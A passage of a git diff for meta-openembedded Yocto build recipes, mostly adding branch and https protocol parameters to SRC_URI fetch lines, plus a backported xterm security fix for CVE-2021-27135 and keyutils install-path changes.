108c339bf5..3ef4f59597 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/qrencode/qrencode_git.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/qrencode/qrencode_git.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=2d5025d4aa3495befef8f17206a5b0a1" PV = "4.0.1+git${SRCPV}" SRCREV = "7c83deb8f562ae6013fea4c3e65278df93f98fb7" -SRC_URI = "git://github.com/fukuchi/libqrencode.git" +SRC_URI = "git://github.com/fukuchi/libqrencode.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-graphics/renderdoc/renderdoc_1.7.bb b/meta-openembedded/meta-oe/recipes-graphics/renderdoc/renderdoc_1.7.bb index 6ea632d064..b20e06a454 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/renderdoc/renderdoc_1.7.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/renderdoc/renderdoc_1.7.bb @@ -5,7 +5,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE.md;md5=df7ea9e196efc7014c124747a0ef9772" SRCREV = "a56af589d94dc851809fd5344d0ae441da70c1f2" -SRC_URI = "git://github.com/baldurk/${BPN}.git;protocol=http;branch=v1.x \ +SRC_URI = "git://github.com/baldurk/${BPN}.git;protocol=http;branch=v1.x;protocol=https \ file://0001-renderdoc-use-xxd-instead-of-cross-compiling-shim-bi.patch \ file://0001-Remove-glslang-pool_allocator-setAllocator.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-graphics/spir/spirv-shader-generator_git.bb b/meta-openembedded/meta-oe/recipes-graphics/spir/spirv-shader-generator_git.bb index b787972da6..bf0a5947b0 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/spir/spirv-shader-generator_git.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/spir/spirv-shader-generator_git.bb @@ -6,7 +6,7 @@ SECTION = "graphics" S = "${WORKDIR}/git" SRCREV = "ed16b3e69985feaf565efbecea70a1cc2fca2a58" -SRC_URI = "git://github.com/KhronosGroup/SPIRV-Cross.git \ +SRC_URI = "git://github.com/KhronosGroup/SPIRV-Cross.git;branch=master;protocol=https \ file://0001-Add-install-PHONY-target-in-Makefile.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-graphics/spir/spirv-tools_git.bb b/meta-openembedded/meta-oe/recipes-graphics/spir/spirv-tools_git.bb index 8e8388e8d4..ec68edf098 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/spir/spirv-tools_git.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/spir/spirv-tools_git.bb @@ -8,11 +8,11 @@ SECTION = "graphics" S = "${WORKDIR}/git" DEST_DIR = "${S}/external" -SRC_URI = "git://github.com/KhronosGroup/SPIRV-Tools.git;name=spirv-tools \ - git://github.com/KhronosGroup/SPIRV-Headers.git;name=spirv-headers;destsuffix=${DEST_DIR}/spirv-headers \ - git://github.com/google/effcee.git;name=effcee;destsuffix=${DEST_DIR}/effcee \ - git://github.com/google/re2.git;name=re2;destsuffix=${DEST_DIR}/re2 \ - git://github.com/google/googletest.git;name=googletest;destsuffix=${DEST_DIR}/googletest \ +SRC_URI = "git://github.com/KhronosGroup/SPIRV-Tools.git;name=spirv-tools;branch=master;protocol=https \ + git://github.com/KhronosGroup/SPIRV-Headers.git;name=spirv-headers;destsuffix=${DEST_DIR}/spirv-headers;branch=master;protocol=https \ + git://github.com/google/effcee.git;name=effcee;destsuffix=${DEST_DIR}/effcee;branch=master;protocol=https \ + git://github.com/google/re2.git;name=re2;destsuffix=${DEST_DIR}/re2;branch=master;protocol=https \ + git://github.com/google/googletest.git;name=googletest;destsuffix=${DEST_DIR}/googletest;branch=master;protocol=https \ file://0001-Respect-CMAKE_INSTALL_LIBDIR-in-installed-CMake-file.patch \ file://0001-Avoid-pessimizing-std-move-3124.patch \ " @@ -21,6 +21,7 @@ SRCREV_spirv-headers = "af64a9e826bf5bb5fcd2434dd71be1e41e922563" SRCREV_effcee = "cd25ec17e9382f99a895b9ef53ff3c277464d07d" SRCREV_re2 = "5bd613749fd530b576b890283bfb6bc6ea6246cb" SRCREV_googletest = "f2fb48c3b3d79a75a88a99fba6576b25d42ec528" +SRCREV_FORMAT = "spirv-ttols_spirv-headers_effcee_re2_googletest" inherit cmake python3native diff --git a/meta-openembedded/meta-oe/recipes-graphics/tesseract/tesseract-lang_4.0.0.bb b/meta-openembedded/meta-oe/recipes-graphics/tesseract/tesseract-lang_4.0.0.bb index 75c2bc00e2..7484c054c0 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/tesseract/tesseract-lang_4.0.0.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/tesseract/tesseract-lang_4.0.0.bb @@ -4,7 +4,7 @@ LICENSE = "Apache-2.0" LIC_FILES_CHKSUM = "file://COPYING;md5=9648bd7af63bd3cc4f5ac046d12c49e4" SRCREV = "590567f20dc044f6948a8e2c61afc714c360ad0e" -SRC_URI = "git://github.com/tesseract-ocr/tessdata.git" +SRC_URI = "git://github.com/tesseract-ocr/tessdata.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-graphics/tesseract/tesseract_git.bb b/meta-openembedded/meta-oe/recipes-graphics/tesseract/tesseract_git.bb index 89d09a0f55..70c98372b3 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/tesseract/tesseract_git.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/tesseract/tesseract_git.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=7ea4f9a43aba9d3c849fe5c203a0ed40" BRANCH = "3.05" PV = "${BRANCH}.01+git${SRCPV}" SRCREV = "215866151e774972c9502282111b998d7a053562" -SRC_URI = "git://github.com/${BPN}-ocr/${BPN}.git;branch=${BRANCH}" +SRC_URI = "git://github.com/${BPN}-ocr/${BPN}.git;branch=${BRANCH};protocol=https" S = "${WORKDIR}/git" DEPENDS = "leptonica" diff --git a/meta-openembedded/meta-oe/recipes-graphics/tigervnc/tigervnc_1.10.1.bb b/meta-openembedded/meta-oe/recipes-graphics/tigervnc/tigervnc_1.10.1.bb index f97c2b2d6c..03b9d6488f 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/tigervnc/tigervnc_1.10.1.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/tigervnc/tigervnc_1.10.1.bb @@ -17,7 +17,7 @@ B = "${S}" SRCREV = "4739493b635372bd40a34640a719f79fa90e4dba" -SRC_URI = "git://github.com/TigerVNC/tigervnc.git;branch=1.10-branch \ +SRC_URI = "git://github.com/TigerVNC/tigervnc.git;branch=1.10-branch;protocol=https \ file://0002-do-not-build-tests-sub-directory.patch \ file://0003-add-missing-dynamic-library-to-FLTK_LIBRARIES.patch \ file://0004-tigervnc-add-fPIC-option-to-COMPILE_FLAGS.patch \ diff --git a/meta-openembedded/meta-oe/recipes-graphics/ttf-fonts/ttf-droid_git.bb b/meta-openembedded/meta-oe/recipes-graphics/ttf-fonts/ttf-droid_git.bb index 8dba7ee6fa..16ac65b1be 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/ttf-fonts/ttf-droid_git.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/ttf-fonts/ttf-droid_git.bb @@ -8,7 +8,7 @@ SRCREV = "21e6e2de1f0062f949fcc52d0b4559dfa3246e0e" PV = "0.1+gitr${SRCPV}" PR = "r3" -SRC_URI = "git://github.com/android/platform_frameworks_base.git;branch=master" +SRC_URI = "git://github.com/android/platform_frameworks_base.git;branch=master;protocol=https" S = "${WORKDIR}/git/data/fonts" diff --git a/meta-openembedded/meta-oe/recipes-graphics/ttf-fonts/ttf-lohit_2.bb b/meta-openembedded/meta-oe/recipes-graphics/ttf-fonts/ttf-lohit_2.bb index 0af0e91d68..7dde4cc661 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/ttf-fonts/ttf-lohit_2.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/ttf-fonts/ttf-lohit_2.bb @@ -8,7 +8,7 @@ LICENSE = "OFL-1.1" LIC_FILES_CHKSUM = "file://OFL.txt;md5=7dfa0a236dc535ad2d2548e6170c4402" SRCREV = "d678f1b1807ea5602586279e90b5db6d62ed475e" -SRC_URI = "git://github.com/pravins/lohit.git;branch=master" +SRC_URI = "git://github.com/pravins/lohit.git;branch=master;protocol=https" DEPENDS = "fontforge-native" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-graphics/ttf-fonts/ttf-noto-emoji_20190815.bb b/meta-openembedded/meta-oe/recipes-graphics/ttf-fonts/ttf-noto-emoji_20190815.bb index e74f7a7f67..1a2f6cb4d2 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/ttf-fonts/ttf-noto-emoji_20190815.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/ttf-fonts/ttf-noto-emoji_20190815.bb @@ -5,7 +5,7 @@ HOMEPAGE = "https://github.com/googlefonts/noto-emoji" LICENSE = "OFL-1.1" LIC_FILES_CHKSUM = "file://fonts/LICENSE;md5=55719faa0112708e946b820b24b14097" -SRC_URI = "git://github.com/googlefonts/noto-emoji;protocol=https" +SRC_URI = "git://github.com/googlefonts/noto-emoji;protocol=https;branch=master" SRCREV = "833a43d03246a9325e748a2d783006454d76ff66" PACKAGES = "${PN}-color ${PN}-regular" diff --git a/meta-openembedded/meta-oe/recipes-graphics/unclutter-xfixes/unclutter-xfixes_1.5.bb b/meta-openembedded/meta-oe/recipes-graphics/unclutter-xfixes/unclutter-xfixes_1.5.bb index 7e22038f24..427882d32b 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/unclutter-xfixes/unclutter-xfixes_1.5.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/unclutter-xfixes/unclutter-xfixes_1.5.bb @@ -5,7 +5,7 @@ AUTHOR = "Ingo Bürk" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=b25d2c4cca175f44120d1b8e67cb358d" -SRC_URI = "git://github.com/Airblader/unclutter-xfixes.git \ +SRC_URI = "git://github.com/Airblader/unclutter-xfixes.git;branch=master;protocol=https \ file://0001-build-use-autotools.patch" SRCREV = "10fd337bb77e4e93c3380f630a0555372778a948" diff --git a/meta-openembedded/meta-oe/recipes-graphics/vdpau/libvdpau_1.3.bb b/meta-openembedded/meta-oe/recipes-graphics/vdpau/libvdpau_1.3.bb index 240949f55c..dd8f41aa5d 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/vdpau/libvdpau_1.3.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/vdpau/libvdpau_1.3.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=83af8811a28727a13f04132cc33b7f58" DEPENDS = "virtual/libx11 libxext xorgproto" SRCREV = "f57a9904c43ef5d726320c77baa91d0c38361ed4" -SRC_URI = "git://anongit.freedesktop.org/vdpau/libvdpau" +SRC_URI = "git://anongit.freedesktop.org/vdpau/libvdpau;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-graphics/x11vnc/x11vnc_0.9.16.bb b/meta-openembedded/meta-oe/recipes-graphics/x11vnc/x11vnc_0.9.16.bb index e3a1914fef..fe725879d0 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/x11vnc/x11vnc_0.9.16.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/x11vnc/x11vnc_0.9.16.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ file://src/x11vnc.h;endline=31;md5=e871a2ad004776794b616822dcab6314" SRCREV = "4ca006fed80410bd9b061a1519bd5d9366bb0bc8" -SRC_URI = "git://github.com/LibVNC/x11vnc \ +SRC_URI = "git://github.com/LibVNC/x11vnc;branch=master;protocol=https \ file://starting-fix.patch \ file://0001-misc-Makefile.am-don-t-install-Xdummy-when-configure.patch \ file://0001-Fix-build-on-32bit-arches-with-64bit-time_t.patch \ diff --git a/meta-openembedded/meta-oe/recipes-graphics/xorg-app/xterm/CVE-2021-27135.patch b/meta-openembedded/meta-oe/recipes-graphics/xorg-app/xterm/CVE-2021-27135.patch new file mode 100644 index 0000000000..937b2176aa --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-graphics/xorg-app/xterm/CVE-2021-27135.patch @@ -0,0 +1,68 @@ +Description: Fix for CVE-2021-27135 from xterm 366 + Correct upper-limit for selection buffer, accounting for + combining characters (report by Tavis Ormandy). + +Upstream-Status: Backport +https://sources.debian.org/data/main/x/xterm/344-1%2Bdeb10u1/debian/patches/CVE-2021-27135.diff +CVE: CVE-2021-27135 +Signed-off-by: Armin Kuster + +--- + button.c | 29 +++++++++++++++++++++++++---- + 1 file changed, 25 insertions(+), 4 deletions(-) + +Index: xterm-353/button.c +=================================================================== +--- xterm-353.orig/button.c ++++ xterm-353/button.c +@@ -3928,6 +3928,7 @@ SaltTextAway(XtermWidget xw, + int i; + int eol; + int need = 0; ++ size_t have = 0; + Char *line; + Char *lp; + CELL first = *cellc; +@@ -3962,7 +3963,11 @@ SaltTextAway(XtermWidget xw, + + /* UTF-8 may require more space */ + if_OPT_WIDE_CHARS(screen, { +- need *= 4; ++ if (need > 0) { ++ if (screen->max_combining > 0) ++ need += screen->max_combining; ++ need *= 6; ++ } + }); + + /* now get some memory to save it in */ +@@ -4000,10 +4005,26 @@ SaltTextAway(XtermWidget xw, + } + *lp = '\0'; /* make sure we have end marked */ + +- TRACE(("Salted TEXT:%u:%s\n", (unsigned) (lp - line), +- visibleChars(line, (unsigned) (lp - line)))); ++ have = (size_t) (lp - line); ++ /* ++ * Scanning the buffer twice is unnecessary. Discard unwanted memory if ++ * the estimate is too-far off. ++ */ ++ if ((have * 2) < (size_t) need) { ++ Char *next; ++ scp->data_limit = have + 1; ++ next = realloc(line, scp->data_limit); ++ if (next == NULL) { ++ free(line); ++ scp->data_length = 0; ++ scp->data_limit = 0; ++ } ++ scp->data_buffer = next; ++ } ++ scp->data_length = have; + +- scp->data_length = (size_t) (lp - line); ++ TRACE(("Salted TEXT:%u:%s\n", (unsigned) have, ++ visibleChars(scp->data_buffer, (unsigned) have))); + } + + #if OPT_PASTE64 diff --git a/meta-openembedded/meta-oe/recipes-graphics/xorg-app/xterm_353.bb b/meta-openembedded/meta-oe/recipes-graphics/xorg-app/xterm_353.bb index 06c285924d..264320212c 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/xorg-app/xterm_353.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/xorg-app/xterm_353.bb @@ -6,6 +6,7 @@ LIC_FILES_CHKSUM = "file://xterm.h;beginline=3;endline=31;md5=996b1ce0584c0747b1 SRC_URI = "http://invisible-mirror.net/archives/${BPN}/${BP}.tgz \ file://0001-Add-configure-time-check-for-setsid.patch \ + file://CVE-2021-27135.patch \ " SRC_URI[md5sum] = "247c30ebfa44623f3a2d100e0cae5c7f" diff --git a/meta-openembedded/meta-oe/recipes-graphics/xorg-driver/xf86-video-armsoc_1.4.1.bb b/meta-openembedded/meta-oe/recipes-graphics/xorg-driver/xf86-video-armsoc_1.4.1.bb index b436ef1e4a..3d60ed1310 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/xorg-driver/xf86-video-armsoc_1.4.1.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/xorg-driver/xf86-video-armsoc_1.4.1.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=10ce5de3b111315ea652a5f74ec0c602" DEPENDS += "virtual/libx11 libdrm xorgproto" SRCREV = "8bbdb2ae3bb8ef649999a8da33ddbe11a04763b8" -SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-armsoc" +SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-armsoc;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-graphics/yad/yad_6.0.bb b/meta-openembedded/meta-oe/recipes-graphics/yad/yad_6.0.bb index 3760a37d31..92a5c284b3 100644 --- a/meta-openembedded/meta-oe/recipes-graphics/yad/yad_6.0.bb +++ b/meta-openembedded/meta-oe/recipes-graphics/yad/yad_6.0.bb @@ -5,7 +5,7 @@ AUTHOR = "Victor Ananjevsky" LICENSE = "GPLv3" LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" -SRC_URI = "git://github.com/v1cont/yad.git" +SRC_URI = "git://github.com/v1cont/yad.git;branch=master;protocol=https" SRCREV = "a5b1a7a3867bc7dffbbc539f586f301687b6ec02" inherit autotools gsettings features_check diff --git a/meta-openembedded/meta-oe/recipes-kernel/agent-proxy/agent-proxy_1.97.bb b/meta-openembedded/meta-oe/recipes-kernel/agent-proxy/agent-proxy_1.97.bb index 2eb19206d3..57232f8d5f 100644 --- a/meta-openembedded/meta-oe/recipes-kernel/agent-proxy/agent-proxy_1.97.bb +++ b/meta-openembedded/meta-oe/recipes-kernel/agent-proxy/agent-proxy_1.97.bb @@ -10,7 +10,7 @@ EXTRA_OEMAKE = "'CC=${CC}'" SRCREV = "468fe4c31e6c62c9bbb328b06ba71eaf7be0b76a" -SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kgdb/agent-proxy.git;protocol=git \ +SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kgdb/agent-proxy.git;protocol=git;branch=master \ file://0001-Makefile-Add-LDFLAGS-variable.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-kernel/broadcom-bt-firmware/broadcom-bt-firmware_git.bb b/meta-openembedded/meta-oe/recipes-kernel/broadcom-bt-firmware/broadcom-bt-firmware_git.bb index 8c474ecdc4..b6fbccfbf5 100644 --- a/meta-openembedded/meta-oe/recipes-kernel/broadcom-bt-firmware/broadcom-bt-firmware_git.bb +++ b/meta-openembedded/meta-oe/recipes-kernel/broadcom-bt-firmware/broadcom-bt-firmware_git.bb @@ -9,7 +9,7 @@ LICENSE = "Firmware-Broadcom-WIDCOMM" NO_GENERIC_LICENSE[Firmware-Broadcom-WIDCOMM] = "LICENSE.broadcom_bcm20702" LIC_FILES_CHKSUM = "file://LICENSE.broadcom_bcm20702;md5=c0d5ea0502b00df74173d0f8a48b619d" -SRC_URI = "git://github.com/winterheart/broadcom-bt-firmware.git" +SRC_URI = "git://github.com/winterheart/broadcom-bt-firmware.git;branch=master;protocol=https" SRCREV = "c0bd928b8ae5754b6077c99afe6ef5c949a58f32" PE = "1" PV = "0.0+git${SRCPV}" diff --git a/meta-openembedded/meta-oe/recipes-kernel/crash/crash_7.2.8.bb b/meta-openembedded/meta-oe/recipes-kernel/crash/crash_7.2.8.bb index 834c92cc46..5dd2c0aa0d 100644 --- a/meta-openembedded/meta-oe/recipes-kernel/crash/crash_7.2.8.bb +++ b/meta-openembedded/meta-oe/recipes-kernel/crash/crash_7.2.8.bb @@ -13,7 +13,7 @@ LIC_FILES_CHKSUM = "file://COPYING3;md5=d32239bcb673463ab874e80d47fae504" DEPENDS = "zlib readline coreutils-native ncurses-native" S = "${WORKDIR}/git" -SRC_URI = "git://github.com/crash-utility/${BPN}.git \ +SRC_URI = "git://github.com/crash-utility/${BPN}.git;branch=master;protocol=https \ ${GNU_MIRROR}/gdb/gdb-7.6.tar.gz;name=gdb;subdir=git \ file://7001force_define_architecture.patch \ file://7003cross_ranlib.patch \ diff --git a/meta-openembedded/meta-oe/recipes-kernel/kpatch/kpatch.inc b/meta-openembedded/meta-oe/recipes-kernel/kpatch/kpatch.inc index 1f70f72054..685be7d40c 100644 --- a/meta-openembedded/meta-oe/recipes-kernel/kpatch/kpatch.inc +++ b/meta-openembedded/meta-oe/recipes-kernel/kpatch/kpatch.inc @@ -3,7 +3,7 @@ DESCRIPTION = "kpatch is a Linux dynamic kernel patching infrastructure which al LICENSE = "GPLv2 & LGPLv2" DEPENDS = "elfutils bash" -SRC_URI = "git://github.com/dynup/kpatch.git;protocol=https \ +SRC_URI = "git://github.com/dynup/kpatch.git;protocol=https;branch=master \ file://0001-kpatch-build-add-cross-compilation-support.patch \ file://0002-kpatch-build-allow-overriding-of-distro-name.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-kernel/minicoredumper/minicoredumper_2.0.1.bb b/meta-openembedded/meta-oe/recipes-kernel/minicoredumper/minicoredumper_2.0.1.bb index d381c83ae8..8188ae599d 100644 --- a/meta-openembedded/meta-oe/recipes-kernel/minicoredumper/minicoredumper_2.0.1.bb +++ b/meta-openembedded/meta-oe/recipes-kernel/minicoredumper/minicoredumper_2.0.1.bb @@ -13,7 +13,7 @@ SRCREV = "16a0d44f1725eaa93096eaa0e086f42ef4c2712c" PR .= "+git${SRCPV}" -SRC_URI = "git://github.com/diamon/minicoredumper;protocol=https \ +SRC_URI = "git://github.com/diamon/minicoredumper;protocol=https;branch=master \ file://minicoredumper.service \ file://minicoredumper.init \ " diff --git a/meta-openembedded/meta-oe/recipes-kernel/pm-graph/pm-graph_5.5.bb b/meta-openembedded/meta-oe/recipes-kernel/pm-graph/pm-graph_5.5.bb index a1378866ad..78d9c36c92 100644 --- a/meta-openembedded/meta-oe/recipes-kernel/pm-graph/pm-graph_5.5.bb +++ b/meta-openembedded/meta-oe/recipes-kernel/pm-graph/pm-graph_5.5.bb @@ -6,7 +6,7 @@ LICENSE = "GPL-2" LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e" SRCREV = "cf59527dc24fdd2f314ae4dcaeb3d68a117988f6" -SRC_URI = "git://github.com/intel/pm-graph.git \ +SRC_URI = "git://github.com/intel/pm-graph.git;branch=master;protocol=https \ file://0001-Makefile-fix-multilib-build-failure.patch \ file://0001-sleepgraph.py-use-python3.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-multimedia/jack/a2jmidid_9.bb b/meta-openembedded/meta-oe/recipes-multimedia/jack/a2jmidid_9.bb index 5fffe77c2d..e33a3f2574 100644 --- a/meta-openembedded/meta-oe/recipes-multimedia/jack/a2jmidid_9.bb +++ b/meta-openembedded/meta-oe/recipes-multimedia/jack/a2jmidid_9.bb @@ -11,7 +11,7 @@ DEPENDS_append_libc-musl = " libexecinfo" SRCREV = "de37569c926c5886768f892c019e3f0468615038" SRC_URI = " \ - git://github.com/linuxaudio/a2jmidid;protocol=https \ + git://github.com/linuxaudio/a2jmidid;protocol=https;branch=master \ file://riscv_ucontext.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-multimedia/jack/jack_1.19.14.bb b/meta-openembedded/meta-oe/recipes-multimedia/jack/jack_1.19.14.bb index e954341ffe..dbf4c1ae74 100644 --- a/meta-openembedded/meta-oe/recipes-multimedia/jack/jack_1.19.14.bb +++ b/meta-openembedded/meta-oe/recipes-multimedia/jack/jack_1.19.14.bb @@ -14,7 +14,7 @@ LIC_FILES_CHKSUM = " \ DEPENDS = "libsamplerate0 libsndfile1 readline" -SRC_URI = "git://github.com/jackaudio/jack2.git \ +SRC_URI = "git://github.com/jackaudio/jack2.git;branch=master;protocol=https \ file://0001-example-clients-Use-c-compiler-for-jack_simdtests.patch \ " SRCREV = "b54a09bf7ef760d81fdb8544ad10e45575394624" diff --git a/meta-openembedded/meta-oe/recipes-multimedia/libass/libass_0.14.0.bb b/meta-openembedded/meta-oe/recipes-multimedia/libass/libass_0.14.0.bb index 3454a5c270..f6c64212fe 100644 --- a/meta-openembedded/meta-oe/recipes-multimedia/libass/libass_0.14.0.bb +++ b/meta-openembedded/meta-oe/recipes-multimedia/libass/libass_0.14.0.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=a42532a0684420bdb15556c3cdd49a75" DEPENDS = "enca fontconfig freetype libpng fribidi" -SRC_URI = "git://github.com/libass/libass.git" +SRC_URI = "git://github.com/libass/libass.git;branch=master;protocol=https" SRCREV = "73284b676b12b47e17af2ef1b430527299e10c17" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-multimedia/mplayer/mpv_0.32.0.bb b/meta-openembedded/meta-oe/recipes-multimedia/mplayer/mpv_0.32.0.bb index 70a39c7b60..13979ae9b9 100644 --- a/meta-openembedded/meta-oe/recipes-multimedia/mplayer/mpv_0.32.0.bb +++ b/meta-openembedded/meta-oe/recipes-multimedia/mplayer/mpv_0.32.0.bb @@ -17,7 +17,7 @@ LICENSE_FLAGS = "commercial" SRCREV_mpv = "70b991749df389bcc0a4e145b5687233a03b4ed7" SRC_URI = " \ - git://github.com/mpv-player/mpv;name=mpv \ + git://github.com/mpv-player/mpv;name=mpv;branch=master;protocol=https \ https://waf.io/waf-2.0.20;name=waf;subdir=git \ " SRC_URI[waf.sha256sum] = "bf971e98edc2414968a262c6aa6b88541a26c3cd248689c89f4c57370955ee7f" diff --git a/meta-openembedded/meta-oe/recipes-multimedia/pipewire/pipewire-0.2_git.bb b/meta-openembedded/meta-oe/recipes-multimedia/pipewire/pipewire-0.2_git.bb index bcb3015f8b..f6cefd8107 100644 --- a/meta-openembedded/meta-oe/recipes-multimedia/pipewire/pipewire-0.2_git.bb +++ b/meta-openembedded/meta-oe/recipes-multimedia/pipewire/pipewire-0.2_git.bb @@ -11,7 +11,7 @@ DEPENDS = "alsa-lib dbus udev" SRCREV = "14c11c0fe4d366bad4cfecdee97b6652ff9ed63d" PV = "0.2.7" -SRC_URI = "git://github.com/PipeWire/pipewire" +SRC_URI = "git://github.com/PipeWire/pipewire;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-multimedia/pipewire/pipewire_git.bb b/meta-openembedded/meta-oe/recipes-multimedia/pipewire/pipewire_git.bb index 1a415c13c3..c55432d3bd 100644 --- a/meta-openembedded/meta-oe/recipes-multimedia/pipewire/pipewire_git.bb +++ b/meta-openembedded/meta-oe/recipes-multimedia/pipewire/pipewire_git.bb @@ -11,7 +11,7 @@ DEPENDS = "alsa-lib dbus udev" SRCREV = "74a1632f0720886d5b3b6c23ee8fcd6c03ca7aac" PV = "0.3.1" -SRC_URI = "git://github.com/PipeWire/pipewire" +SRC_URI = "git://github.com/PipeWire/pipewire;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-multimedia/v4l2apps/yavta_git.bb b/meta-openembedded/meta-oe/recipes-multimedia/v4l2apps/yavta_git.bb index a192d1a3bb..98542ffe61 100644 --- a/meta-openembedded/meta-oe/recipes-multimedia/v4l2apps/yavta_git.bb +++ b/meta-openembedded/meta-oe/recipes-multimedia/v4l2apps/yavta_git.bb @@ -2,7 +2,7 @@ SUMMARY = "Yet Another V4L2 Test Application" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING.GPL;md5=751419260aa954499f7abaabaa882bbe" -SRC_URI = "git://git.ideasonboard.org/yavta.git \ +SRC_URI = "git://git.ideasonboard.org/yavta.git;branch=master \ file://0001-Add-stdout-mode-to-allow-streaming-over-the-network-.patch" SRCREV = "7e9f28bedc1ed3205fb5164f686aea96f27a0de2" diff --git a/meta-openembedded/meta-oe/recipes-multimedia/webm/libvpx_1.8.2.bb b/meta-openembedded/meta-oe/recipes-multimedia/webm/libvpx_1.8.2.bb index 4a98ec17dd..d607bbebe8 100644 --- a/meta-openembedded/meta-oe/recipes-multimedia/webm/libvpx_1.8.2.bb +++ b/meta-openembedded/meta-oe/recipes-multimedia/webm/libvpx_1.8.2.bb @@ -8,7 +8,7 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=d5b04755015be901744a78cc30d390d4" SRCREV = "7ec7a33a081aeeb53fed1a8d87e4cbd189152527" -SRC_URI += "git://chromium.googlesource.com/webm/libvpx;protocol=https \ +SRC_URI += "git://chromium.googlesource.com/webm/libvpx;protocol=https;branch=master \ file://libvpx-configure-support-blank-prefix.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-security/keyutils/keyutils_1.6.1.bb b/meta-openembedded/meta-oe/recipes-security/keyutils/keyutils_1.6.1.bb index 0a8c2e4834..879dbe5cae 100644 --- a/meta-openembedded/meta-oe/recipes-security/keyutils/keyutils_1.6.1.bb +++ b/meta-openembedded/meta-oe/recipes-security/keyutils/keyutils_1.6.1.bb @@ -31,6 +31,9 @@ EXTRA_OEMAKE = "'CFLAGS=${CFLAGS} -Wall' \ LIBDIR=${libdir} \ USRLIBDIR=${libdir} \ INCLUDEDIR=${includedir} \ + ETCDIR=${sysconfdir} \ + SHAREDIR=${datadir}/keyutils \ + MANDIR=${datadir}/man \ BUILDFOR=${SITEINFO_BITS}-bit \ NO_GLIBC_KEYERR=1 \ " @@ -40,18 +43,6 @@ do_install () { oe_runmake DESTDIR=${D} install } -do_install_append_class-nativesdk() { - install -d ${D}${datadir} - src_dir="${D}${target_datadir}" - mv $src_dir/* ${D}${datadir} - par_dir=`dirname $src_dir` - rmdir $src_dir $par_dir - - install -d ${D}${sysconfdir} - mv ${D}/etc/* ${D}${sysconfdir}/ - rmdir ${D}/etc -} - do_install_ptest () { cp -r ${S}/tests ${D}${PTEST_PATH}/ sed -i -e 's/OSDIST=Unknown/OSDIST=${DISTRO}/' ${D}${PTEST_PATH}/tests/prepare.inc.sh diff --git a/meta-openembedded/meta-oe/recipes-security/softhsm/softhsm_git.bb b/meta-openembedded/meta-oe/recipes-security/softhsm/softhsm_git.bb index 3236cb9a60..4ceda3d4b8 100644 --- a/meta-openembedded/meta-oe/recipes-security/softhsm/softhsm_git.bb +++ b/meta-openembedded/meta-oe/recipes-security/softhsm/softhsm_git.bb @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=ef3f77a3507c3d91e75b9f2bdaee4210" DEPENDS = "openssl" PV = 